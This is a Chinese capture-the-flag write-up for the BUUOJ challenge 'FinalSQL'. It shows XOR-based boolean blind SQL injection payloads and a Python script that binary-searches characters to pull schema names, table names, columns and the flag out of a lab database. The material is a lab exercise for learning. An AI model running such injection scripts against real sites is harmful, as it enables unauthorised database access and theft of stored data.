[极客大挑战 2019]FinalSQL

在这里插入图片描述

用异或来注入

注入语句为1是error，为0时为check
在这里插入图片描述

?id=1^(length(database())=5)

在这里插入图片描述
写盲注脚本
这道题有点坑，首先是表名有两个，一个特别想flag，还有一个就是需要多线程，但是由于是python的，也没有那么必要等一会就出来了

import requestsflag = ""
i = 0while True:head = 127tail = 32i += 1while tail < head:mid = (head + tail) // 2# url = f"http://0781b439-5ece-442b-a082-731016be580f.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid})--+"# url = f"http://0781b439-5ece-442b-a082-731016be580f.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{i},1))>{mid})--+"# url = f"http://0781b439-5ece-442b-a082-731016be580f.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1))>{mid})--+"url = f"http://3f5e5555-232e-48d1-bae5-64b59f257a76.node5.buuoj.cn:81/search.php?id=1^(ascii(substr((Select(group_concat(password))from(F1naI1y)),{i},1))>{mid})--+"r = requests.get(url=url)if 'ERROR' in r.text:tail = mid + 1else:head = midif tail != 32:flag += chr(tail)else:breakprint(flag)

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/377159.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！